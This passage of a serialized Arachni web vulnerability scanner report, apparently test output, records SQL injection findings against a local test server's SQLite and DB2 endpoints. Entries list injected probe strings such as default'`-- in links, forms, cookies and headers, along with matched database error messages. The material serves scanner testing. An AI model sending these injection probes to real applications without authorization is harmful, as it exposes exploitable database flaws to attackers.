"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/sqlite/link/append?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Warning.*sqlite_.*) :match: Warning stuff sqlite_ :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default) :follow_location: true :injected: default) :combo: !binary "aW5wdXQ=": default) :action: http://localhost:7362/sqlite/link/append?input=default :verification: :id: Warning stuff sqlite_ var: input url: http://localhost:7362/sqlite/link/append?input=default injected: default) id: Warning stuff sqlite_ regexp: (?i-mx:Warning.*sqlite_.*) regexp_match: Warning stuff sqlite_ elem: link remarks: {} method: GET response: ! 
'Warning stuff sqlite_ SQLite/JDBCDriver SQLite.Exception System.Data.SQLite.SQLiteException ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OTI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDo1OSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: cookie2 url: http://localhost:7362/sqlite/cookie/append elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Warning.*sqlite_.*) :match: Warning stuff sqlite_ :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value) :injected: cookie value) :combo: !binary "Y29va2llMg==": cookie value) :action: http://localhost:7362/sqlite/cookie/append :verification: :id: Warning stuff sqlite_ var: cookie2 url: http://localhost:7362/sqlite/cookie/append injected: cookie value) id: Warning stuff sqlite_ regexp: (?i-mx:Warning.*sqlite_.*) regexp_match: Warning stuff sqlite_ elem: cookie remarks: {} method: GET response: ! 
'Warning stuff sqlite_ SQLite/JDBCDriver SQLite.Exception System.Data.SQLite.SQLiteException ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value) response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OTI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTowMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/sqlite/cookie/flip elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Warning.*sqlite_.*) :match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"] :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: Parameter flip :element: cookie :params: {} :follow_location: true :cookies: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/sqlite/cookie/flip :verification: :id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"] var: Parameter flip url: http://localhost:7362/sqlite/cookie/flip injected: '' id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"] regexp: (?i-mx:Warning.*sqlite_.*) regexp_match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"] elem: cookie remarks: {} method: GET response: ! 
'[nil, "Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;'`--=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA1 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTowMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: true references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/sqlite/header/flip elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: true references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Warning.*sqlite_.*) :match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil] :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: Parameter flip :element: header :params: :follow_location: true :headers: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ! 
'''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/sqlite/header/flip :verification: :id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil] var: Parameter flip url: http://localhost:7362/sqlite/header/flip injected: '' id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil] regexp: (?i-mx:Warning.*sqlite_.*) regexp_match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil] elem: header remarks: {} method: GET response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, "Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev ! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjUw !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. 
tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: User-Agent url: http://localhost:7362/sqlite/header/append elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Warning.*sqlite_.*) :match: Warning stuff sqlite_ :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! 
'''`--' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user'`-- :injected: arachni_user'`-- :combo: User-Agent: arachni_user'`-- :action: http://localhost:7362/sqlite/header/append :verification: :id: Warning stuff sqlite_ var: User-Agent url: http://localhost:7362/sqlite/header/append injected: arachni_user'`-- id: Warning stuff sqlite_ regexp: (?i-mx:Warning.*sqlite_.*) regexp_match: Warning stuff sqlite_ elem: header remarks: {} method: GET response: ! 'Warning stuff sqlite_ SQLite/JDBCDriver SQLite.Exception System.Data.SQLite.SQLiteException ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user'`-- Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OTI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToxNSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/db2/form/flip elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:DB2 SQL error:) :match: ! 'DB2 SQL error:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: Parameter flip :element: form :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! 
'''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/db2/form/flip :verification: :id: ! 'DB2 SQL error:' var: Parameter flip url: http://localhost:7362/db2/form/flip injected: '' id: ! 'DB2 SQL error:' regexp: (?i-mx:DB2 SQL error:) regexp_match: ! 'DB2 SQL error:' elem: form remarks: {} method: GET response: ! '["DB2 SQL error:\n[IBM][CLI Driver][DB2/6000]\nCLI Driver stuff DB2\nDB2 SQL error\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToyMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/db2/form/append elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:DB2 SQL error:) :match: ! 'DB2 SQL error:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/db2/form/append :verification: :id: ! 'DB2 SQL error:' var: input url: http://localhost:7362/db2/form/append injected: default'`-- id: ! 
'DB2 SQL error:' regexp: (?i-mx:DB2 SQL error:) regexp_match: ! 'DB2 SQL error:' elem: form remarks: {} method: GET response: ! 'DB2 SQL error: [IBM][CLI Driver][DB2/6000] CLI Driver stuff DB2 DB2 SQL error ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nzg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToyMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/db2/link/append?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. 
tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:DB2 SQL error:) :match: ! 'DB2 SQL error:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/db2/link/append?input=default :verification: :id: ! 'DB2 SQL error:' var: input url: http://localhost:7362/db2/link/append?input=default injected: default'`-- id: ! 'DB2 SQL error:' regexp: (?i-mx:DB2 SQL error:) regexp_match: ! 'DB2 SQL error:' elem: link remarks: {} method: GET response: ! 
'DB2 SQL error: [IBM][CLI Driver][DB2/6000] CLI Driver stuff DB2 DB2 SQL error ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nzg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToyNSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/db2/link/flip?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
